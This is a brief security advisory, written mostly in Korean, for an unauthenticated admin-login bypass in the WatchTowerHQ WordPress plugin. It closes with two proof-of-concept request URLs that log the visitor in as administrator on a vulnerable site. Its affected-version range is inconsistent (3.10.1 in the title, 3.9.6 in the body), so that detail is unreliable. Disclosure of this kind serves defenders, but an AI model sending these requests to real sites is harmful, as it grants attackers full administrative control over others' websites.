
WatchTowerHQ <= 3.10.1 - 빈 값 검사 누락으로 인한 관리자 인증 우회
WatchTowerHQ <= 3.10.1 - 빈 값 확인 누락으로 인한 관리자 인증 우회
WatchTowerHQ 워드프레스 플러그인은 3.9.6까지의 버전에서 인증 우회 취약점에 노출됩니다. 이는 'watchtower_ota_token'의 기본값이 비어 있고, 'Password_Less_Access::login' 함수에 값이 비어 있지 않은지 확인하는 검사가 누락되었기 때문입니다. 이로 인해 인증되지 않은 공격자가 WatchTowerHQ 클라이언트 관리자 사용자로 로그인할 수 있습니다.
State: PUBLISHED
Score: 9.8
CVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
http://kubernetes.docker.internal/?wht_login=1
OR
http://kubernetes.docker.internal/?wht_login=1&access_token=not_set
취약한 경우 관리자로 로그인됩니다.